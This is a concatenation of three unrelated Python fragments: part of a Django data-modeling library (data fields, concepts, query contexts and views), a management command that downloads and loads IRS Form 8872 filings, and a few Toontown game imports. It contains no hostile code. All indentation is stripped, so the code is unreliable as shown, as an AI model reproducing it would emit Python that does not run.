# An optional unit for this field's data. In some cases databases may have
# a separate column which denotes the unit for another column, but this is
# not always the case. Measurement data, for example, should be
# standardized in the database to allow for consistent querying, thus not
# requiring a separate column denoting the unit per value.
unit = models.CharField(max_length=30, null=True, blank=True)
unit_plural = models.CharField(max_length=40, null=True, blank=True)
# Although a category does not technically need to be defined, this is more
# for workflow reasons than for when the concept is published. Automated
# prcesses may create concepts on the fly, but not know which category they
# should be linked to initially.
category = models.ForeignKey(DataCategory, null=True, blank=True)
# Set this field to true to make this field's values enumerable. This
# should only be enabled for data that contains a discrete vocabulary, i.e.
# no full text data.
enumerable = models.BooleanField(default=False)
# Set this field to False if you wish to exclude this field's data from the
# Haystack index.
indexable = models.BooleanField(default=True)
type = models.CharField(max_length=100, blank=True, null=True,
help_text='Logical type of this field. Typically '
'used downstream for defining behavior '
'and semantics around the field.')
# An optional translator which customizes input query conditions
# to a format which is suitable for the database.
translator = models.CharField(max_length=100, blank=True, null=True,
choices=translators.choices)
# This is used for the cache key to check if the cached values is stale.
data_version = models.IntegerField(default=1, help_text='The current '
'version of the underlying data for '
'this field as of the last '
'modification/update.')
# Certain fields may not be relevant or appropriate for all
# sites being deployed. This is primarily for preventing exposure of
# access to private data from certain sites. For example, there may and
# internal and external deployment of the same site. The internal site
# has full access to all fields, while the external may have a limited set.
# NOTE this is not reliable way to prevent exposure of sensitive data.
# This should be used to simply hide _access_ to the concepts.
sites = models.ManyToManyField(Site, blank=True, related_name='fields+')
# The order of this datafield with respect to the category (if defined).
order = models.FloatField(null=True, blank=True, db_column='_order')
objects = managers.DataFieldManager()
class Meta(object):
unique_together = ('app_name', 'model_name', 'field_name')
ordering = ('category__order', 'category__name', 'order', 'name')
permissions = (
('view_datafield', 'Can view datafield'),
)
@classmethod
def init(cls, app_name, model_name=None, field_name=None, **kwargs):
"""Convenience method for initializing a new instance with metadata
populated directly from the model field instance. This returns an
_unsaved_ instance.
"""
# Field instance
if isinstance(app_name, models.Field):
field = app_name
field_name = field.name
model_name = field.model.module_name
app_name = field.model._meta.app_label
# Dot-delimited string
elif isinstance(app_name, basestring) and '.' in app_name:
values = app_name.split('.')
if len(values) != 3:
raise ValueError("The dot-delimited field format must "
"be 'app.model.field'.")
app_name, model_name, field_name = values
defaults = {
'app_name': app_name,
'model_name': model_name.lower(),
'field_name': field_name,
}
# Temp instance to validate the model field exists
f = cls(**defaults)
if not f.model:
raise ValueError('Unknown model {0}'.format(f.model_name))
if not f.field:
raise ValueError('Unknown field {0} on model {1}.'
.format(f.field_name, f.model_name))
# Add field-derived components
defaults.update({
'name': f.field.verbose_name.title(),
'description': f.field.help_text or None,
})
# Update defaults with kwargs
defaults.update(kwargs)
return cls(**defaults)
def __unicode__(self):
if self.name:
return self.name
return u'{0} {1}'.format(self.model._meta.verbose_name,
self.field.verbose_name).title()
def __len__(self):
return self.size()
def __nonzero__(self):
"Takes precedence over __len__, so it is always truthy."
return True
# The natural key should be used any time fields are being exported
# for integration in another system. It makes it trivial to map to new
# data models since there are discrete parts (as suppose to using the
# primary key).
def natural_key(self):
return self.app_name, self.model_name, self.field_name
# Django Model Field-related Properties and Methods
@property
def real_model(self):
"Returns the model class this datafield is associated with."
if not hasattr(self, '_real_model'):
self._real_model = models.get_model(self.app_name, self.model_name)
return self._real_model
@property
def real_field(self):
"Returns the field object this datafield is associated with."
if self.real_model:
try:
return self.real_model._meta.get_field(self.field_name)
except FieldDoesNotExist:
pass
@property
def model(self):
"Returns the model class this datafield represents."
return self.real_model
@property
def field(self):
"Returns the field object this datafield represents."
return self.real_field
@property
def value_field_name(self):
"Alias for field name."
return self.field_name
@property
def value_field(self):
"Alias for field."
return self.field
@property
def label_field(self):
"Returns the label field object for this datafield."
model = self.model
if model:
field_name = None
if self.label_field_name:
field_name = self.label_field_name
if field_name:
try:
return model._meta.get_field(field_name)
except FieldDoesNotExist:
pass
return self.field
@property
def search_field(self):
"Returns the search field object for this datafield."
model = self.model
if model and self.search_field_name:
try:
return model._meta.get_field(self.search_field_name)
except FieldDoesNotExist:
pass
return self.label_field
@property
def order_field(self):
"Returns the order field object for this datafield."
model = self.model
if model:
field_name = None
if self.order_field_name:
field_name = self.order_field_name
if field_name:
try:
return model._meta.get_field(field_name)
except FieldDoesNotExist:
pass
return self.field
@property
def code_field(self):
"Returns the code field object for this datafield."
model = self.model
if model:
field_name = None
if self.code_field_name:
field_name = self.code_field_name
if field_name:
try:
return model._meta.get_field(field_name)
except FieldDoesNotExist:
pass
@property
def nullable(self):
"Returns whether this field can contain NULL values."
return self.field.null
@property
def internal_type(self):
"Returns the internal type of the field this datafield represents."
return utils.get_internal_type(self.field)
@property
def simple_type(self):
"""Returns a simple type mapped from the internal type."
By default, it will use the field's internal type, but can be
overridden by the ``SIMPLE_TYPE_MAP`` setting.
"""
return utils.get_simple_type(self.field)
@property
def searchable(self):
"Returns true if a text-field and is not an enumerable field."
# Optimized shortcut to prevent database hit for enumerable check..
if self.search_field == self.field:
simple_type = utils.get_simple_type(self.field)
return simple_type == 'string' and not self.enumerable
return utils.is_searchable(self.search_field)
# Convenience Methods
# Easier access to the underlying data for this data field
def values_list(self, order=True, distinct=True, queryset=None):
"Returns a `ValuesListQuerySet` of values for this field."
value_field = self.value_field.name
order_field = self.order_field.name
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values_list(value_field, flat=True)
if order:
queryset = queryset.order_by(order_field)
if distinct:
return queryset.distinct()
return queryset
def labels_list(self, order=True, distinct=True, queryset=None):
"Returns a `ValuesListQuerySet` of labels for this field."
label_field = self.label_field.name
order_field = self.order_field.name
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values_list(label_field, flat=True)
if order:
queryset = queryset.order_by(order_field)
if distinct:
return queryset.distinct()
return queryset
def codes_list(self, order=True, distinct=True, queryset=None):
"Returns a `ValuesListQuerySet` of labels for this field."
if not self.code_field:
return
code_field = self.code_field.name
order_field = self.order_field.name
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values_list(code_field, flat=True)
if order:
queryset = queryset.order_by(order_field)
if distinct:
return queryset.distinct()
return queryset
def search(self, query, queryset=None):
"Rudimentary search for string-based values."
if utils.get_simple_type(self.search_field) == 'string':
field_name = self.search_field.name
filters = {u'{0}__icontains'.format(field_name): query}
return self.values_list(queryset=queryset).filter(**filters)
def get_plural_unit(self):
if self.unit_plural:
plural = self.unit_plural
elif self.unit and not self.unit.endswith('s'):
plural = self.unit + 's'
else:
plural = self.unit
return plural
def get_label(self, value, queryset=None):
"Get the corresponding label to a value."
labels = self.value_labels(queryset=queryset)
if value in labels:
return labels[value]
return smart_unicode(value)
def _has_predefined_choices(self):
"""Returns true if the base field has pre-defined choices and no
alternative label field has been defined.
"""
return bool(self.field.choices)
# Data-related Cached Properties
# These may be cached until the underlying data changes
@cached_method(version='data_version')
def size(self, queryset=None):
"Returns the count of distinct values."
if self._has_predefined_choices():
return len(self.field.choices)
return self.values_list(queryset=queryset).count()
@cached_method(version='data_version')
def values(self, queryset=None):
"Returns a distinct list of values."
if self._has_predefined_choices():
return tuple(zip(*self.field.choices)[0])
return tuple(self.values_list(queryset=queryset))
@cached_method(version='data_version')
def labels(self, queryset=None):
"Returns a distinct list of labels."
if self._has_predefined_choices():
labels = zip(*self.field.choices)[1]
return tuple(smart_unicode(l) for l in labels)
return tuple(
smart_unicode(l) for l in self.labels_list(queryset=queryset))
@cached_method(version='data_version')
def codes(self, queryset=None):
"Returns a distinct set of coded values for this field"
if self._has_predefined_choices():
return tuple(range(self.size(queryset=queryset)))
if self.code_field:
return tuple(self.codes_list(queryset=queryset))
def value_labels(self, queryset=None):
"Returns a distinct set of value/label pairs for this field."
return ChoicesDict(zip(
self.values(queryset=queryset), self.labels(queryset=queryset)))
def coded_labels(self, queryset=None):
"Returns a distinct set of code/label pairs for this field."
codes = self.codes(queryset=queryset)
if codes is not None:
return ChoicesDict(zip(codes, self.labels(queryset=queryset)))
def coded_values(self, queryset=None):
"Returns a distinct set of code/value pairs for this field."
codes = self.codes(queryset=queryset)
if codes is not None:
return ChoicesDict(zip(codes, self.values(queryset=queryset)))
# Alias since it's common parlance in Django
choices = value_labels
coded_choices = coded_labels
# Data Aggregation Properties
def groupby(self, *args, **kwargs):
return Aggregator(
self.field, queryset=kwargs.get('queryset')).groupby(*args)
@cached_method(version='data_version')
def count(self, *args, **kwargs):
"Returns an the aggregated counts."
return Aggregator(
self.field,
queryset=kwargs.pop('queryset', None)).count(*args, **kwargs)
@cached_method(version='data_version')
def max(self, *args, **kwargs):
"Returns the maximum value."
return Aggregator(
self.field, queryset=kwargs.get('queryset')).max(*args)
@cached_method(version='data_version')
def min(self, *args, **kwargs):
"Returns the minimum value."
return Aggregator(
self.field, queryset=kwargs.get('queryset')).min(*args)
@cached_method(version='data_version')
def avg(self, *args, **kwargs):
"Returns the average value. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field, queryset=kwargs.get('queryset')).avg(*args)
@cached_method(version='data_version')
def sum(self, *args, **kwargs):
"Returns the sum of values. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field, queryset=kwargs.get('queryset')).sum(*args)
@cached_method(version='data_version')
def stddev(self, *args, **kwargs):
"Returns the standard deviation. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field,
queryset=kwargs.get('queryset')).stddev(*args)
@cached_method(version='data_version')
def variance(self, *args, **kwargs):
"Returns the variance. Only applies to quantitative data."
if self.simple_type == 'number':
return Aggregator(
self.field,
queryset=kwargs.get('queryset')).variance(*args)
@cached_method(version='data_version')
def sparsity(self, *args, **kwargs):
"Returns the ratio of null values in the population."
if 'queryset' in kwargs:
queryset = kwargs.get('queryset')
else:
queryset = self.model.objects.all()
count = queryset.count()
# No data, 100% sparsity
if count == 0:
return 1.0
isnull = '{0}__isnull'.format(self.value_field.name)
nulls = queryset.filter(**{isnull: True}).count()
return nulls / float(count)
@cached_method(version='data_version')
def dist(self, queryset=None):
if queryset is None:
queryset = self.model.objects.all()
queryset = queryset.values(self.value_field.name)\
.annotate(cnt=Count(self.value_field.name))\
.values_list(self.value_field.name, 'cnt')\
.order_by(self.value_field.name)
return tuple(queryset)
# Translator Convenience Methods
@property
def operators(self):
"Returns the valid operators for this datafield."
trans = translators[self.translator]
return [(x, operators[x].verbose_name) for x
in trans.get_operators(self)]
def translate(self, operator=None, value=None, tree=None, **context):
"Convenince method for performing a translation on a query condition."
trans = translators[self.translator]
return trans.translate(self, operator, value, tree, **context)
def validate(self, operator=None, value=None, tree=None, **context):
"Convenince method for performing a translation on a query condition."
trans = translators[self.translator]
return trans.validate(self, operator, value, tree, **context)
def random(self, k, queryset=None):
"""
Returns a k length list of values of this datafield's value population.
"""
return random.sample(self.values(queryset=queryset), k)
class DataConcept(BasePlural, PublishArchiveMixin):
"""Our acceptance of an ontology is, I think, similar in principle to our
acceptance of a scientific theory, say a system of physics; we adopt, at
least insofar as we are reasonable, the simplest conceptual scheme into
which the disordered fragments of raw experience can be fitted and
arranged.
-- Willard Van Orman Quine
"""
type = models.CharField(max_length=100, blank=True, null=True)
# Although a category does not technically need to be defined, this more
# for workflow reasons than for when the concept is published. Automated
# prcesses may create concepts on the fly, but not know which category they
# should be linked to initially. the admin interface enforces choosing a
# category when the concept is published
category = models.ForeignKey(DataCategory, null=True, blank=True)
# The associated fields for this concept. fields can be
# associated with multiple concepts, thus the M2M
fields = models.ManyToManyField(DataField, through='DataConceptField',
related_name='concepts')
# Certain concepts may not be relevant or appropriate for all
# sites being deployed. This is primarily for preventing exposure of
# access to private data from certain sites. For example, there may and
# internal and external deployment of the same site. The internal site
# has full access to all fields, while the external may have a limited set.
# NOTE this is not reliable way to prevent exposure of sensitive data.
# This should be used to simply hide _access_ to the concepts.
sites = models.ManyToManyField(Site, blank=True, related_name='concepts+')
order = models.FloatField(null=True, blank=True, db_column='_order')
# An optional formatter which provides custom formatting for this
# concept relative to the associated fields.
formatter = models.CharField('formatter', max_length=100, blank=True,
null=True,
choices=formatters.registry.choices)
# A flag that denotes this concept is viewable, that is, this the concept
# is appropriate to be used as a viewable interface. Non-viewable concepts
# can be used to prevent exposing underlying data that may not be
# appropriate for client consumption.
viewable = models.BooleanField(default=True)
# A flag that denotes this concept is 'queryable' which assumes fields
# that DO NOT result in a nonsensicle representation of the concept.
queryable = models.BooleanField(default=True)
# A flag that denotes when this concept can be applied to an ORDER BY
# Certain concepts are not appropriate because they are too complicated,
# or a very specific abstraction that does not order by what it actually
# represents.
sortable = models.BooleanField(default=True)
# Set this field to False if you wish to exclude DataFields associated
# with this concept from the Haystack index.
indexable = models.BooleanField(default=True)
objects = managers.DataConceptManager()
class Meta(object):
app_label = 'avocado'
ordering = ('category__order', 'category__name', 'order', 'name')
permissions = (
('view_dataconcept', 'Can view dataconcept'),
)
class DataConceptField(models.Model):
"Through model between DataConcept and DataField relationships."
field = models.ForeignKey(DataField, related_name='concept_fields')
concept = models.ForeignKey(DataConcept, related_name='concept_fields')
name = models.CharField(max_length=100, null=True, blank=True)
name_plural = models.CharField(max_length=100, null=True, blank=True)
order = models.FloatField(null=True, blank=True, db_column='_order')
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
class Meta(object):
ordering = ('order', 'name')
def __unicode__(self):
return self.name or unicode(self.field)
def __bytes__(self):
return self.__unicode__().encode('utf8')
def get_plural_name(self):
if self.name_plural:
return self.name_plural
if self.name:
if not self.name.endswith('s'):
return self.name + 's'
return self.name
return self.field.get_plural_name()
class DataContext(Base):
"""JSON object representing one or more data field conditions. The data may
be a single condition, an array of conditions or a tree stucture.
This corresponds to the `WHERE` statements in a SQL query.
"""
json = jsonfield.JSONField(null=True, blank=True, default=dict,
validators=[parsers.datacontext.validate])
session = models.BooleanField(default=False)
template = models.BooleanField(default=False)
default = models.BooleanField(default=False)
# The parent this instance was derived from
parent = models.ForeignKey('self', null=True, blank=True,
related_name='forks')
# For authenticated users the `user` can be directly referenced,
# otherwise the session key can be used.
user = models.ForeignKey(User, null=True, blank=True,
related_name='datacontext+')
session_key = models.CharField(max_length=40, null=True, blank=True)
accessed = models.DateTimeField(default=datetime.now(), editable=False)
objects = managers.DataContextManager()
def __init__(self, *args, **kwargs):
if args and isinstance(args[0], dict):
if 'json' in kwargs:
raise TypeError("{0}.__init__() got multiple values for "
"keyword argument 'json'"
.format(self.__class__.__name__))
args = list(args)
kwargs['json'] = args.pop(0)
super(DataContext, self).__init__(*args, **kwargs)
def __unicode__(self):
toks = []
# Identifier
if self.name:
toks.append(self.name)
elif self.user_id:
toks.append(unicode(self.user))
elif self.session_key:
toks.append(self.session_key)
elif self.pk:
toks.append('#{0}'.format(self.pk))
else:
toks.append('unsaved')
# State
if self.default:
toks.append('default template')
elif self.template:
toks.append('template')
elif self.session:
toks.append('session')
else:
toks.append('rogue')
return u'{0} ({1})'.format(*toks)
def clean(self):
if self.template and self.default:
queryset = self.__class__.objects.filter(template=True,
default=True)
if self.pk:
queryset = queryset.exclude(pk=self.pk)
if queryset.exists():
raise ValidationError('Only one default template can be '
'defined')
def save(self, *args, **kwargs):
self.clean()
super(DataContext, self).save(*args, **kwargs)
def _combine(self, other, operator):
if not isinstance(other, self.__class__):
raise TypeError('Other object must be a DataContext instance')
cxt = self.__class__()
cxt.user_id = self.user_id or other.user_id
if self.json and other.json:
cxt.json = {
'type': operator,
'children': [
{'composite': self.pk},
{'composite': other.pk}
]
}
elif self.json:
cxt.json = {'composite': self.pk}
elif other.json:
cxt.json = {'composite': other.pk}
return cxt
def __and__(self, other):
return self._combine(other, 'and')
def __or__(self, other):
return self._combine(other, 'or')
@classmethod
def validate(cls, attrs, **context):
"Validate `attrs` as a context."
return parsers.datacontext.validate(attrs, **context)
@cached_method(version='modified')
def count(self, *args, **kwargs):
return self.apply(*args, **kwargs).values('pk').count()
def parse(self, tree=None, **context):
"Returns a parsed node for this context."
return parsers.datacontext.parse(self.json, tree=tree, **context)
def apply(self, queryset=None, tree=None, **context):
"Applies this context to a QuerySet."
if tree is None and queryset is not None:
tree = queryset.model
return self.parse(tree=tree, **context).apply(queryset=queryset)
def language(self, tree=None, **context):
return self.parse(tree=tree, **context).language
class DataView(Base):
"""JSON object representing one or more data field conditions. The data may
be a single condition, an array of conditions or a tree stucture.
This corresponds to the `SELECT` and `ORDER BY` statements in a SQL query.
"""
json = jsonfield.JSONField(null=True, blank=True, default=dict,
validators=[parsers.dataview.validate])
session = models.BooleanField(default=False)
template = models.BooleanField(default=False)
default = models.BooleanField(default=False)
# The parent this instance was derived from
parent = models.ForeignKey('self', null=True, blank=True,
related_name='forks')
# For authenticated users the `user` can be directly referenced,
# otherwise the session key can be used.
user = models.ForeignKey(User, null=True, blank=True,
related_name='dataview+')
session_key = models.CharField(max_length=40, null=True, blank=True)
accessed = models.DateTimeField(default=datetime.now(), editable=False)
objects = managers.DataViewManager()
def __init__(self, *args, **kwargs):
if args and isinstance(args[0], dict):
if 'json' in kwargs:
raise TypeError("{0}.__init__() got multiple values for "
"keyword argument 'json'"
.format(self.__class__.__name__))
args = list(args)
kwargs['json'] = args.pop(0)
super(DataView, self).__init__(*args, **kwargs)
def __unicode__(self):
toks = []
# Identifier
if self.name:
toks.append(self.name)
elif self.user_id:
toks.append(unicode(self.user))
elif self.session_key:
toks.append(self.session_key)
elif self.pk:
toks.append('#{0}'.format(self.pk))
else:
toks.append('unsaved')
# State
if self.default:
toks.append('default template')
elif self.template:
toks.append('template')
elif self.session:
toks.append('session')
else:
toks.append('rogue')
return u'{0} ({1})'.format(*toks)
@classmethod
def validate(cls, attrs, **context):
"Validates `attrs` as a view."
return parsers.dataview.validate(attrs, **context)
def parse(self, tree=None, **context):
"Returns a parsed node for this view."
return parsers.dataview.parse(self.json, tree=tree, **context)
def apply(self, queryset=None, tree=None, include_pk=True, **context):
"Applies this context to a QuerySet."
if tree is None and queryset is not None:
tree = queryset.model
return self.parse(tree=tree, **context) \
.apply(queryset=queryset, include_pk=include_pk)
def clean(self):
from django.core.exceptions import ValidationError
if self.template and self.default:
queryset = self.__class__.objects.filter(template=True,
default=True)
if self.pk:
queryset = queryset.exclude(pk=self.pk)
if queryset.exists():
raise ValidationError('Only one default template can be '
'defined')
def save(self, *args, **kwargs):
self.clean()
super(self.__class__, self).save(*args, **kwargs)
class DataQuery(Base):
"""
JSON object representing a complete query.
The query is constructed from a context(providing the 'WHERE' statements)
and a view(providing the 'SELECT' and 'ORDER BY" statements). This
corresponds to all the statements of the SQL query to dictate what info
to retrieve, how to filter it, and the order to display it in.
"""
session = models.BooleanField(default=False)
template = models.BooleanField(default=False)
default = models.BooleanField(default=False)
# The parent this instance was derived from
parent = models.ForeignKey('self', null=True, blank=True,
related_name='forks')
# For authenticated users the `user` can be directly referenced,
# otherwise the session key can be used.
user = models.ForeignKey(User, null=True, blank=True,
related_name='dataquery+')
session_key = models.CharField(max_length=40, null=True, blank=True)
accessed = models.DateTimeField(default=datetime.now, editable=False)
objects = managers.DataQueryManager()
shared_users = models.ManyToManyField(User,
related_name='shareddataquery+')
# Flag indicating whether this is a public query or not. Public queries are
# visible to all other users of the system while non-public queries are
# only visible to the query owner and those in the shared_users collection.
public = models.BooleanField(default=False)
context_json = jsonfield.JSONField(
null=True, blank=True, default=dict,
validators=[parsers.datacontext.validate])
view_json = jsonfield.JSONField(
null=True, blank=True, default=dict,
validators=[parsers.dataview.validate])
class Meta(object):
verbose_name_plural = 'data queries'
def __init__(self, *args, **kwargs):
if args and isinstance(args[0], dict):
data = args[0]
args = args[1:]
if 'context_json' in kwargs:
raise TypeError("{0}.__init__() got multiple values for "
"keyword argument 'context_json'"
.format(self.__class__.__name__))
if 'view_json' in kwargs:
raise TypeError("{0}.__init__() got multiple values for "
"keyword argument 'view_json'"
.format(self.__class__.__name__))
kwargs['context_json'] = data.get('context')
kwargs['view_json'] = data.get('view')
super(DataQuery, self).__init__(*args, **kwargs)
def __unicode__(self):
toks = []
# Identifier
if self.name:
toks.append(self.name)
elif self.user_id:
toks.append(unicode(self.user))
elif self.session_key:
toks.append(self.session_key)
elif self.pk:
toks.append('#{0}'.format(self.pk))
else:
toks.append('unsaved')
# State
if self.default:
toks.append('default template')
elif self.template:
toks.append('template')
elif self.session:
toks.append('session')
else:
toks.append('rogue')
return u'{0} ({1})'.format(*toks)
@property
def context(self):
# An inverse pk is used to prevent colliding with saved instances.
# A pk is necessary for proper cache key formation.
pk = -self.pk if self.pk else None
return DataContext(pk=pk, json=self.context_json)
@property
def view(self):
# An inverse pk is used to prevent colliding with saved instances.
# A pk is necessary for proper cache key formation.
pk = -self.pk if self.pk else None
return DataView(pk=pk, json=self.view_json)
@property
def json(self):
return {
'context': self.context_json,
'view': self.view_json
}
@classmethod
def validate(cls, attrs, **context):
"Validates `attrs` as a query."
return parsers.dataquery.validate(attrs, **context)
@cached_method(version='modified')
def count(self, *args, **kwargs):
return self.apply(*args, **kwargs).count()
def parse(self, tree=None, **context):
"Returns a parsed node for this query."
json = {
'context': self.context_json,
'view': self.view_json,
}
return parsers.dataquery.parse(json, tree=tree, **context)
def apply(self, queryset=None, tree=None, distinct=True, include_pk=True,
**context):
"Applies this context to a QuerySet."
if tree is None and queryset is not None:
tree = queryset.model
return self.parse(tree=tree, **context) \
.apply(queryset=queryset, distinct=distinct, include_pk=include_pk)
def clean(self):
from django.core.exceptions import ValidationError
if self.template and self.default:
queryset = self.__class__.objects.filter(template=True,
default=True)
if self.pk:
queryset = queryset.exclude(pk=self.pk)
if queryset.exists():
raise ValidationError('Only one default template can be '
'defined')
def save(self, *args, **kwargs):
self.clean()
super(self.__class__, self).save(*args, **kwargs)
def share_with_user(self, username_or_email, create_user=True):
"""
Attempts to add a user with the supplied email address or username
to the list of shared users for this query. If create_user is set to
True, users will be created for emails that are not already associated
with an existing user. New users are not created for a provided
username if it cannot be found.
Returns True if the email/username was added to the list of shared
users and False if the email/username wasn't added because it already
exists or wasn't created.
"""
# If both share setttings are set to false, nothing can be done
if not settings.SHARE_BY_USERNAME and not settings.SHARE_BY_EMAIL:
log.warning('Cannot share with any user because SHARE_BY_USERNAME'
' and SHARE_BY_EMAIL are both set to False.')
return False
# If the query is already shared then there is no need to share it
# again.
if self.shared_users.filter(
Q(email__iexact=username_or_email) |
Q(username__iexact=username_or_email)).exists():
return False
user = None
# Create a Q() object to build our query
q = Q()
if settings.SHARE_BY_USERNAME:
if settings.SHARE_BY_USERNAME_CASE_SENSITIVE:
q |= Q(username=username_or_email)
else:
q |= Q(username__iexact=username_or_email)
if settings.SHARE_BY_EMAIL:
q |= Q(email__iexact=username_or_email)
# Try to retrive a user. If this fails, create a new user with the
# email address
try:
user = User.objects.get(q)
except User.DoesNotExist:
log.warning('Cannot find user "{0}".'.format(username_or_email))
if not user and create_user:
try:
user = utils.create_email_based_user(username_or_email)
except ValidationError:
log.warning('Could not create user with email. "{0}" is not a '
'valid email.'.format(username_or_email))
# If a user was found/created, add that user to shared users
if user:
self.shared_users.add(user)
self.save()
return True
return False
# Register instance-level cache invalidation handlers
post_save.connect(post_save_cache, sender=DataField)
post_save.connect(post_save_cache, sender=DataConcept)
post_save.connect(post_save_cache, sender=DataCategory)
pre_delete.connect(pre_delete_uncache, sender=DataField)
pre_delete.connect(pre_delete_uncache, sender=DataConcept)
pre_delete.connect(pre_delete_uncache, sender=DataCategory)
# Register with history API
if settings.HISTORY_ENABLED:
history.register(DataContext, fields=('name', 'description', 'json'))
history.register(DataView, fields=('name', 'description', 'json'))
history.register(DataQuery, fields=('name', 'description', 'context_json',
'view_json'))
| |
import os
import csv
import shutil
import zipfile
import requests
import string
from decimal import Decimal
from datetime import datetime
from django.conf import settings
from django.core.management.base import BaseCommand
from irs.models import F8872, Contribution, Expenditure, Committee
# These are terms in the raw data that don't actually mean anything
NULL_TERMS = [
'N/A',
'NOT APPLICABLE',
'NA',
'NONE',
'NOT APPLICABE',
'NOT APLICABLE',
'N A',
'N-A']
CONTRIBUTIONS = []
EXPENDITURES = []
# Running list of filing ids so we don't add contributions or expenditures
# without an associated filing
PARSED_FILING_IDS = set()
class RowParser:
"""
Takes a row from the raw data and a mapping of field
positions to field names in order to clean and save the
row to the database.
"""
def __init__(self, form_type, mapping, row):
self.form_type = form_type
self.mapping = mapping
self.row = row
self.parsed_row = {}
self.parse_row()
self.create_object()
def clean_cell(self, cell, cell_type):
"""
Uses the type of field (from the mapping) to
determine how to clean and format the cell.
"""
try:
# Get rid of non-ASCII characters
cell = cell.encode('ascii', 'ignore').decode()
if cell_type == 'D':
cell = datetime.strptime(cell, '%Y%m%d')
elif cell_type == 'I':
cell = int(cell)
elif cell_type == 'N':
cell = Decimal(cell)
else:
cell = cell.upper()
if len(cell) > 50:
cell = cell[0:50]
if not cell or cell in NULL_TERMS:
cell = None
except:
cell = None
return cell
def parse_row(self):
"""
Parses a row, cell-by-cell, returning a dict of field names
to the cleaned field values.
"""
fields = self.mapping
for i, cell in enumerate(self.row[0:len(fields)]):
field_name, field_type = fields[str(i)]
parsed_cell = self.clean_cell(cell, field_type)
self.parsed_row[field_name] = parsed_cell
def create_contribution(self):
contribution = Contribution(**self.parsed_row)
# If there's no filing in the database for this contribution
if contribution.form_id_number not in PARSED_FILING_IDS:
# Skip this contribution
return
contribution.filing_id = contribution.form_id_number
contribution.committee_id = contribution.EIN
CONTRIBUTIONS.append(contribution)
def create_object(self):
if self.form_type == 'A':
self.create_contribution()
elif self.form_type == 'B':
expenditure = Expenditure(**self.parsed_row)
# If there's no filing in the database for this expenditure
if expenditure.form_id_number not in PARSED_FILING_IDS:
# Skip this expenditure
return
expenditure.filing_id = expenditure.form_id_number
expenditure.committee_id = expenditure.EIN
EXPENDITURES.append(expenditure)
elif self.form_type == '2':
filing = F8872(**self.parsed_row)
PARSED_FILING_IDS.add(filing.form_id_number)
print('Parsing filing {}'.format(filing.form_id_number))
committee, created = Committee.objects.get_or_create(
EIN=filing.EIN)
if created:
committee.name = filing.organization_name
committee.save()
filing.committee = committee
filing.save()
class Command(BaseCommand):
help = "Download the latest IRS filings and load them into the database"
def add_arguments(self, parser):
parser.add_argument(
'--test',
action='store_true',
dest='test',
default=False,
help='Use a subset of data for testing',
)
def handle(self, *args, **options):
# Create a temporary data directory
self.data_dir = os.path.join(
settings.BASE_DIR,
'data')
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
# Where to download the raw zipped archive
self.zip_path = os.path.join(
self.data_dir,
'zipped_archive.zip')
# Where to extract the archive
self.extract_path = os.path.join(
self.data_dir)
# Where to store the data file
self.final_path = os.path.join(
self.data_dir,
'FullDataFile.txt')
print('Flushing database')
F8872.objects.all().delete()
Contribution.objects.all().delete()
Expenditure.objects.all().delete()
Committee.objects.all().delete()
if options['test']:
print('Using test data file')
self.final_path = os.path.join(
os.path.dirname(
os.path.dirname(
os.path.dirname(__file__))),
'tests',
'TestDataFile.txt')
else:
print('Downloading latest archive')
self.download()
self.unzip()
self.clean()
print('Parsing archive')
self.build_mappings()
global CONTRIBUTIONS
global EXPENDITURES
with open(self.final_path, 'r') as raw_file:
reader = csv.reader(raw_file, delimiter='|')
for row in reader:
if len(CONTRIBUTIONS) > 5000:
Contribution.objects.bulk_create(CONTRIBUTIONS)
CONTRIBUTIONS = []
if len(EXPENDITURES) > 5000:
Expenditure.objects.bulk_create(EXPENDITURES)
EXPENDITURES = []
try:
form_type = row[0]
if form_type == '2':
RowParser(form_type, self.mappings['F8872'], row)
elif form_type == 'A':
RowParser(form_type, self.mappings['sa'], row)
elif form_type == 'B':
RowParser(form_type, self.mappings['sb'], row)
except IndexError:
pass
print('Resolving amendments')
for filing in F8872.objects.filter(amended_report_indicator=1):
previous_filings = F8872.objects.filter(
committee_id=filing.EIN,
begin_date=filing.begin_date,
end_date=filing.end_date,
form_id_number__lt=filing.form_id_number)
previous_filings.update(
is_amended=True,
amended_by_id=filing.form_id_number)
# Delete the data directory
shutil.rmtree(os.path.join(self.data_dir))
def download(self):
"""
Download the archive from the IRS website.
"""
print('Starting download')
url = 'http://forms.irs.gov/app/pod/dataDownload/fullData'
r = requests.get(url, stream=True)
with open(self.zip_path, 'wb') as f:
# This is a big file, so we download in chunks
for chunk in r.iter_content(chunk_size=30720):
print('Downloading...')
f.write(chunk)
f.flush()
def unzip(self):
"""
Unzip the archive.
"""
print('Unzipping archive')
with zipfile.ZipFile(self.zip_path, 'r') as zipped_archive:
data_file = zipped_archive.namelist()[0]
zipped_archive.extract(data_file, self.extract_path)
def clean(self):
"""
Get the .txt file from within the many-layered
directory structure, then delete the directories.
"""
print('Cleaning up archive')
shutil.move(
os.path.join(
self.data_dir,
'var/IRS/data/scripts/pofd/download/FullDataFile.txt'
),
self.final_path
)
shutil.rmtree(os.path.join(self.data_dir, 'var'))
os.remove(self.zip_path)
def build_mappings(self):
"""
Uses CSV files of field names and positions for
different filing types to load mappings into memory,
for use in parsing different types of rows.
"""
self.mappings = {}
for record_type in ('sa', 'sb', 'F8872'):
path = os.path.join(
os.path.dirname(
os.path.dirname(
os.path.dirname(__file__))),
'mappings',
'{}.csv'.format(record_type))
mapping = {}
with open(path, 'r') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
mapping[row['position']] = (
row['model_name'],
row['field_type'])
self.mappings[record_type] = mapping
| |
from pandac.PandaModules import *
from toontown.toonbase.ToontownGlobals import *
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from direct.showbase import DirectObject
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import StateData
from toontown.toonbase import ToontownGlobals
from toontown.toonbase import TTLocalizer
import types
from toontown.toon import NPCToons
from toontown.toon import NPCFriendPanel
from toontown.toonbase import ToontownBattleGlobals
